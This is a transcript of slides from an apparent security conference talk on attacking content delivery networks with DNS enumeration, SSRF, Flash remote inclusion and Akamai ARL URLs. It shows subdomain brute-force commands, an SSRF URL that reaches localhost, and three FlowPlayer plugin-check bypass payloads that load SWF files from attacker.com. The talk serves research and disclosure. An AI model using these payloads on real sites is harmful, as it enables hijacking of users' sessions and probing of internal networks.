Bypass Surgery Abusing Content Delivery Networks With ...
Transcript of Bypass Surgery Abusing Content Delivery Networks With ...
![Page 1: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/1.jpg)
Bypass Surgery Abusing Content Delivery Networks With Server Side Request Forgery (SSRF), Flash, and DNSBY MIKE BROOKS AND MATTHEW BRYANT
August 6, 2015
![Page 2: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/2.jpg)
22
Security Consultant for Bishop Fox
Maintainer of The Hacker Blog: https://thehackerblog.com
@IAmMandatory
Signal Fingerprint
05 d4 6b db 51 31 9b 43 b6 6b c6 96 91 fb 3c 1e 60 3c 93
6b 4e 1f 55 8e 54 9a 93 e0 a4 c3 ad 99 34
HAS BEEN KNOWN TO HACK THINGS
Matthew Bryant (mandatory)
![Page 3: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/3.jpg)
33
STACKOVERFLOW.COM & SECURITY.STACKEXCHANGE.COM
rook
![Page 4: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/4.jpg)
44
• Almost all modern web applications depend on third-party services to operate.
• These third parties are implicitly trusted and work invisibly in the background.
WORKING BUT TANGLED
Interconnected Services
![Page 5: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/5.jpg)
55
• The web consists of many content delivery networks (CDNs) that deliver content via large distributed networks.
• When you visit your favorite sites, you unknowingly trust these services.
ONE PAGE SPAWNING MANY REQUESTS
Content Delivery Networks
![Page 6: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/6.jpg)
66
ONE PAGE SPAWNING MANY REQUESTS
How People Think the Web Works…
foxnews.com homepage?
![Page 7: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/7.jpg)
77
ONE PAGE SPAWNING MANY REQUESTS
How People Think the Web Works…
Here you go!
![Page 8: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/8.jpg)
88
ONE PAGE SPAWNING MANY REQUESTS
How It Actually Works…
![Page 9: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/9.jpg)
99
• Many sites on the Internet trust a short list of CDNs to serve their content.
• What happens when a vulnerability is found in a CDN provider?
• The impact is severe and far reaching.
WHAT COULD GO WRONG
Many Sites Trusting a Few CDNs
![Page 10: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/10.jpg)
1010
ATTACK CHAINS
What happened?
SSRF
Remote
SWF
Include
![Page 11: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/11.jpg)
DNS RECONNAISSANCE DNS HOLDS THE KEYS
![Page 12: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/12.jpg)
1212
Internal External
INFRASTRUCTURE
A Divided Penetration Testing Scope
![Page 13: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/13.jpg)
1313
TOOLS
DNS meta-query spider
• https://github.com/TheRook/subbrute
Search though a mass-reverse lookup DB
• https://dnsdumpster.com/
Brute-force forward-lookups
• https://github.com/darkoperator/dnsrecon
Profiling With DNS
![Page 14: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/14.jpg)
1414
SubBrute 2.0
Source: https://github.com/TheRook/subbrute
• Through (~3 hours) – Authoritative NS used by default
./subbrute.py google.com –p –s names_large
• Very Fast (~8 minutes) – Using Open Resolvers
./subbrute.py google.com –p –r resolvers.txt
![Page 15: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/15.jpg)
1515
QUERIES ABOUT QUERIES
DNS Meta Queries
AXFR - Transfers entire zone file from the master name server to “secondary name servers”
ANY - Returns all records of all types known to the name server. If the name server does not have any information on the name, the request will be forwarded on.
![Page 16: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/16.jpg)
1616
DNS META QUERY
dig any google.com @8.8.8.8
![Page 17: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/17.jpg)
1717
DNS META QUERY SPIDER
./subbrute.py google.com –p –o goog.csv
![Page 18: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/18.jpg)
1818
Types of Records Found on Google.com
Total Records: 3056 Total Subdomains: 358
A, 2379
CNAME, 231
AAAA, 255
MX, 146
NS, 12
SRV, 22
SOA, 3
NOERROR, 7
TYPE257, 1
A
CNAME
AAAA
MX
NS
SRV
SOA
NOERROR
TYPE257
0 500 1000 1500 2000 2500
![Page 19: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/19.jpg)
1919
DNS RECORD TYPE 257
RFC-6844: DNS Certificate Pinning
Source: https://en.wikipedia.org/wiki/DNS_Certification_Authority_Authorization
![Page 20: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/20.jpg)
2020
DNS Record Type 257
http://arstechnica.com/security/2015/04/google-chrome-will-banish-chinese-certificate-authority-for-breach-of-trust/
![Page 21: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/21.jpg)
2121
RFC-6698: DNSSEC PKI
Source: https://en.wikipedia.org/wiki/DNS-based_Authentication_of_Named_Entities
![Page 22: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/22.jpg)
2222
VOIP, CALENDAR, AND LDAP SERVICES
SRV Record Enumeration
• _caldav._tcp.google.com,SRV,5 0 80 calendar.google.com.
• _jabber-client._tcp.google.com,SRV,20 0 5222 alt1.xmpp.l.google.com.
• _ldap._tcp.google.com,SRV,5 0 389 ldap.google.com.
• _xmpp-client._tcp.google.com,SRV,5 0 5222 xmpp.l.google.com._xmpp-
• server._tcp.google.com,SRV,5 0 5269 xmpp-server.l.google.com.
![Page 23: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/23.jpg)
2323
SOP BYPASS AT SCALE
Akamai EdgeSuite - DNS
static.fbcdn.com
static.facebook.com.edgesuite.net.
a1860.g.akamai.net.
64.145.75.11
![Page 24: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/24.jpg)
2424
VOIP, CALENDAR, AND LDAP SERVICES
subbrute - Internal Network Assessment
subbrute.exe MicrosoftDomain.com –r internal_resolvers.txt –s names_large.txt
... 19 domain controllers found…
_ldap._tcp.dc._msdcs.MicrosoftDomain.com,SRV,0 100 389 rangers.LegitBank.com.
_ldap._tcp.dc._msdcs.MicrosoftDomain.com,SRV,0 100 389 sharks.DOMAIN.com.
_ldap._tcp.dc._msdcs.MicrosoftDomain.com,SRV,0 100 389 canucks.DOMAIN.com.
![Page 25: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/25.jpg)
2525
A Common DNS Misconfiguration
Source: https://cwe.mitre.org/data/definitions/203.html
![Page 26: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/26.jpg)
2626
NOERROR RESPONSES
./subbrute.py LegitBank.com –p –o comp
_domainkey.LegitBank.com,NOERROR,
sci.LegitBank.com,NOERROR,
vcs.LegitBank.com,NOERROR,
dev.LegitBank.com,NOERROR,
internal.LegitBank.com,NOERROR
![Page 27: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/27.jpg)
2727
INTERNAL ADDRESSES
NOERROR?
cat comp | grep NOERROR > comp.ne
./subbrute.py –t comp.ne –p –o comp.internal
ldap.sci.LegitBank.com,CNAME,prod-ldap-proxy-
vip.sci.LegitBank.com.
prod-ldap-proxy-vip.sci.LegitBank.com, CNAME,prod-
ldap-proxy-vip-sv4.sci.LegitBank.com.
prod-ldap-proxy-vip-sv4.sci.LegitBank.com, A,10.30.40.40
![Page 28: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/28.jpg)
2828
CONTINUED
NOERROR?
./subbrute.py –t comp.ne –p –o comp.internal
…
accounting.internal.LegitBank.com, A,10.30.0.41
monitoring.internal.LegitBank.com, A,10.30.0.42
![Page 29: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/29.jpg)
SERVER-SIDE REQUEST FORGERYIT’S A TRUST THING
![Page 30: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/30.jpg)
3030
CROSSING THE ORIGIN BOUNDARY
Server Trust
LegitBank.com
![Page 31: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/31.jpg)
3131
FIRST TWO HITS ARE SSRF
Search for “Cross Domain Proxy”
![Page 32: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/32.jpg)
3232
TOOLS
Netcat for the 21st century
• https://nmap.org/ncat/
HTTP Request and Response Service
• http://httpbin.org/
Burp Collaborator
• http://blog.portswigger.net/2015/04/introducing-burp-collaborator.html
SSRF tools
![Page 33: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/33.jpg)
3333
Access to the Web Server’s localhost
http://legitbank.com/proxy.php?csurl=http://localhost:631
![Page 34: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/34.jpg)
3434
Access to the Web Server’s localhost
![Page 35: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/35.jpg)
3535
Access to Internal Network Hardware
![Page 36: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/36.jpg)
3636
CROSSING THE ORIGIN BOUNDARY
Server Trust
LegitBank.com
www.LegitBank.com
accounting.internal.LegitBank.com
![Page 37: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/37.jpg)
3737
TOOLS
SSRF In A Load Balancer
![Page 38: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/38.jpg)
3838
PATHS TO EXPLOITATION
• Can I access a protected resource?
• XXE DTD system to make HTTP Requests?
• Internal IP Address or Hosts?
• “Virtual Private Cloud,” S3, MongoDB HTTP interface?
• Can I connect to a host I control?
• Can I load arbitrary content such as a SWF on the domain?
SSRF Questions
![Page 39: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/39.jpg)
FLASH REMOTE SWF INCLUDE VULNERABILITIESGONE IN A FLASH
![Page 40: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/40.jpg)
4040
Crossdomain.xml Proof of Concept Tool
• https://thehackerblog.com/crossdomain/
FlashHTTPRequest
• https://github.com/mandatoryprogrammer/FlashHTTPRequest
JPEXS
• https://www.free-decompiler.com/flash/
SEARCHDIGGITY
• http://www.bishopfox.com/resources/tools/google-hacking-diggity/attack-tools/
MEN HAVE BECOME TOOLS OF THEIR TOOLS
Tools
![Page 41: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/41.jpg)
JAVASCRIPT VS FLASH REMOTE INCLUSIONCROSSING THE ORIGIN BOUNDARY
![Page 42: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/42.jpg)
4242
• An origin is a combination of port, scheme, and domain.
• Origins separate sites from accessing each other’s data due to the Same Origin Policy (SOP).
• For example, a script executing in the context of the http://example.com origin could not read data from http://thirdparty.com because the origins do not match.
CROSSING THE ORIGIN BOUNDARY
What’s an origin?
![Page 43: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/43.jpg)
4343
JavaScript
• Remote JavaScript includes execute in the context of the including site’s origin.
Flash
• Remote includes execute in the context of the hosting site’s origin.
CROSSING THE ORIGIN BOUNDARY
Differences between JavaScript and Flash
![Page 44: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/44.jpg)
4444
CROSSING THE ORIGIN BOUNDARY
Remote JavaScript Inclusion Example
http://legitbank.com/
<!DOCTYPE html>
<html>
<head></head>
<body>
<h1>Script Origin:<p id="origin"></p></h1>
<script src="http://thirdparty.com/example.js"></script>
</body>
</html>
![Page 45: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/45.jpg)
4545
CROSSING THE ORIGIN BOUNDARY
Remote JavaScript Inclusion Example
http://thirdparty.com/example.js
document.getElementById(‘origin’).innerText = location.origin
![Page 46: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/46.jpg)
4646
CROSSING THE ORIGIN BOUNDARY
Remote JavaScript Inclusion
![Page 47: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/47.jpg)
4747
CROSSING THE ORIGIN BOUNDARY
Remote Flash Inclusion Example
http://legitbank.com/
<!DOCTYPE html>
<html>
<head></head>
<body>
<object type=“application/x-shockwave-flash” data=“http://thirdparty.com/example.swf”>
</body>
</html>
![Page 48: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/48.jpg)
4848
CROSSING THE ORIGIN BOUNDARY
Remote Flash Inclusion Example
http://thirdparty.com/secrets.txt
Secrets on thirdparty.com!
![Page 49: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/49.jpg)
4949
• Before Flash preforms a cross-origin request, the target site’s crossdomain.xml file is checked.
• This file permits third-party sites to perform authenticated requests via allow-access-from
domain tags.
• Wildcard usage is allowed and is commonplace.
CROSSING THE ORIGIN BOUNDARY
Flash Cross-Domain Policies
![Page 50: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/50.jpg)
5050
CROSSING THE ORIGIN BOUNDARY
Example Crossdomain.xml File
http://legitbank.com/crossdomain.xml
<cross-domain-policy>
<allow-access-from domain=“*.legitbank.com”>
<allow-access-from domain=“*.thirdparty.com”>
</cross-domain-policy>
![Page 51: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/51.jpg)
5151
75%
25%
USES DOESN'T USE
*NOT INCLUDING SITES WITH JUST A WILDCARD ENTRY
Usage of domain wildcards (*.domain.com)?
*Taken from a survey of Alexa top 10,000 sites
![Page 52: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/52.jpg)
5252
• Enumerate all subdomains of a domain name:
• ./subbrute.py thirdparty.com
• ./subbrute.py legitbank.com
• An arbitrary SWF upload or vulnerable SWF on any domain will compromise the security of legitbank.com.
CROSSING THE ORIGIN BOUNDARY
Enumerating Subdomains With Subbrute
![Page 53: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/53.jpg)
FLOWPLAYERDON’T HATE THE PLAYER
![Page 54: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/54.jpg)
5454
• FlowPlayer is a Flash application that plays videos and allows the loading of arbitrary Flash plugins.
DON’T HATE THE PLAYER
FlowPlayer
![Page 55: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/55.jpg)
5555
• Problematically, FlowPlayer versions below 3.2.16 allowed the loading of plugins from arbitrary domains.
• This means an attacker can hijack the functionality of FlowPlayer by loading arbitrary plugins into the player.
DON’T HATE THE PLAYER
FlowPlayer
![Page 56: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/56.jpg)
5656
DON’T HATE THE PLAYER
FlowPlayer
http://legitbank.com/
flowplayer("player", vulnerable_player,{
plugins: {
controls: null,
SimpleHelloWorld: {
url: 'http://thirdparty.com/plugin.swf',
}
}
});
![Page 57: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/57.jpg)
5757
• With the release of FlowPlayer 3.2.18 new code was introduced to prevent loading of arbitrary plugins.
• This code parses the plugin URL to check if it’s trusted before loading it.
• However, we found three bypasses by auditing the plugin checking code.
DON’T HATE THE PLAYER
Multiple FlowPlayer Bypasses
![Page 58: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/58.jpg)
5858
![Page 59: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/59.jpg)
5959
DON’T HATE THE PLAYER
FlowPlayer Bypass #1 – The Check
public static function isLocal(url:String):Boolean {
trace("localDomain? " + url);
if (url.indexOf("http://localhost") == 0) return true;
if (url.indexOf("http://localhost:") == 0) return true;
if (url.indexOf("file://") == 0) return true;
if (url.indexOf("http://127.0.0.1") == 0) return true;
if (url.indexOf("http://") == 0) return false;
if (url.indexOf("/") == 0) return true;
return false;
}
![Page 60: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/60.jpg)
6060
DON’T HATE THE PLAYER
FlowPlayer Bypass #1 – The Check
public static function isLocal(url:String):Boolean {
trace("localDomain? " + url);
if (url.indexOf("http://localhost") == 0) return true;
if (url.indexOf("http://localhost:") == 0) return true;
if (url.indexOf("file://") == 0) return true;
if (url.indexOf("http://127.0.0.1") == 0) return true;
if (url.indexOf("http://") == 0) return false;
if (url.indexOf("/") == 0) return true;
return false;
}
![Page 61: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/61.jpg)
6161
DON’T HATE THE PLAYER
FlowPlayer Bypass #1 – The Bypass
http://attacker.com/
flowplayer("player", vulnerable_player,{
plugins: {
controls: null,
SimpleHelloWorld: {
url: ’//attacker.com/exploit.swf',
}
}
});
![Page 62: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/62.jpg)
6262
DON’T HATE THE PLAYER
FlowPlayer Bypass #2 – The Check
public static function getDomain(url:String):String {
var schemeEnd:int = getSchemeEnd(url);
var domain:String = url.substr(schemeEnd);
var endPos:int = getDomainEnd(domain);
return domain.substr(0, endPos).toLowerCase();
}
internal static function getSchemeEnd(url:String):int {
var pos:int = url.indexOf("///");
if (pos >= 0) return pos + 3;
pos = url.indexOf("//");
if (pos >= 0) return pos + 2;
return 0;
}
![Page 63: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/63.jpg)
6363
DON’T HATE THE PLAYER
FlowPlayer Bypass #2 – The Check
public static function getDomain(url:String):String {
var schemeEnd:int = getSchemeEnd(url);
var domain:String = url.substr(schemeEnd);
var endPos:int = getDomainEnd(domain);
return domain.substr(0, endPos).toLowerCase();
}
internal static function getSchemeEnd(url:String):int {
var pos:int = url.indexOf("///");
if (pos >= 0) return pos + 3;
pos = url.indexOf("//");
if (pos >= 0) return pos + 2;
return 0;
}
![Page 64: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/64.jpg)
6464
DON’T HATE THE PLAYER
FlowPlayer Bypass #2 – The Bypass
http://attacker.com/
flowplayer("player", vulnerable_player,{
plugins: {
controls: null,
SimpleHelloWorld: {
url: ’http://attacker.com///legitbank.com/../flowplayer/plugin.swf',
}
}
});
![Page 65: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/65.jpg)
6565
DON’T HATE THE PLAYER
FlowPlayer Bypass #3 – The Bypass
http://attacker.com/
flowplayer("player", vulnerable_player,{
plugins: {
controls: null,
SimpleHelloWorld: {
url: ’http://legitbank.com/openredirect.php?url=http://attacker.com/flowplayer/plugin.swf',
}
}
});
![Page 66: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/66.jpg)
6666
There are probably many more, but three is a cool number.
DON’T HATE THE PLAYER
More bypasses…
![Page 67: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/67.jpg)
6767
(Artist interpretation)
![Page 68: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/68.jpg)
6868
CROSSING THE ORIGIN BOUNDARY
Flowplayer
attacker.com
legitbank.com
![Page 69: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/69.jpg)
6969
CROSSING THE ORIGIN BOUNDARY
Flowplayer
Users logs in to legitbank.com
attacker.com
legitbank.com
![Page 70: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/70.jpg)
7070
CROSSING THE ORIGIN BOUNDARY
Flowplayer
attacker.com
legitbank.com
![Page 71: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/71.jpg)
7171
CROSSING THE ORIGIN BOUNDARY
Flowplayer
attacker.com
legitbank.com
![Page 72: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/72.jpg)
7272
CROSSING THE ORIGIN BOUNDARY
Flowplayer
attacker.com
legitbank.com
![Page 73: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/73.jpg)
7373
CROSSING THE ORIGIN BOUNDARY
Flowplayer
ATTACKER HIJACKS SWF WITH PLUGIN
attacker.com
legitbank.com
![Page 74: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/74.jpg)
7474
CROSSING THE ORIGIN BOUNDARY
Flowplayer
attacker.com
legitbank.com
![Page 75: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/75.jpg)
HACKING WEBSITES WITH AKAMAI EDGESUITESOP BYPASS AT SCALE
![Page 76: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/76.jpg)
WHAT IS EDGESUITE?SOP BYPASS AT SCALE
![Page 77: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/77.jpg)
7777
• EdgeSuite.net is used in Akamai’s Content Delivery Network (CDN).
• Part of the FreeFlow service, Akamai’s legacy content delivery network.
• The setup process for FreeFlow involves pointing DNS records to Akamai’s network.
• Instead of hitting your site directly the Akamai service acts as a caching and distribution service.
SOP BYPASS AT SCALE
Akamai EdgeSuite
![Page 78: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/78.jpg)
7878
SOP BYPASS AT SCALE
Akamai EdgeSuite - DNS
akamai.example.com
x.example.com.edgesuite.net.
a1337.g.akamai.net.
184.25.56.98
![Page 79: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/79.jpg)
7979
SOP BYPASS AT SCALE
Akamai EdgeSuite
akamai.example.com
example.com
![Page 80: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/80.jpg)
8080
SOP BYPASS AT SCALE
Akamai EdgeSuite
akamai.example.com
example.com
![Page 81: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/81.jpg)
8181
SOP BYPASS AT SCALE
Akamai EdgeSuite
akamai.example.com
example.com
![Page 82: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/82.jpg)
8282
SOP BYPASS AT SCALE
Akamai EdgeSuite
akamai.example.com
example.com
![Page 83: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/83.jpg)
AKAMAI RESOURCE LOCATORS (ARL)SOP BYPASS AT SCALE
![Page 84: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/84.jpg)
8484
• Akamai Resource Locator
• Special URL use to host files on the Akamai network.
• A deprecated service that Akamai used to do when setting up clients for their CDN solution.
• Despite being deprecated, many endpoints still have it enabled.
SOP BYPASS AT SCALE
ARLv1
![Page 85: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/85.jpg)
8585
Say you want to host this file on Akamai:
http://example.edgesuite.net/flow/swf/example.
swf
SOP BYPASS AT SCALE
ARLv1
![Page 86: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/86.jpg)
8686
http://akamai.example.com/f/248/322142/1d/example.edge
suite.net/flow/swf/example.swf
SOP BYPASS AT SCALE
ARLv1
CACHE OPTIONS (TIME TO CACHE, CLIENT ID, ETC.)
THE URL TO THE FILE
WEBSITE POINTING TO AKAMAI
![Page 87: Bypass Surgery Abusing Content Delivery Networks With ...](https://reader031.fdocuments.net/reader031/viewer/2022030201/621d659155956441b92b0c36/html5/thumbnails/87.jpg)
8787
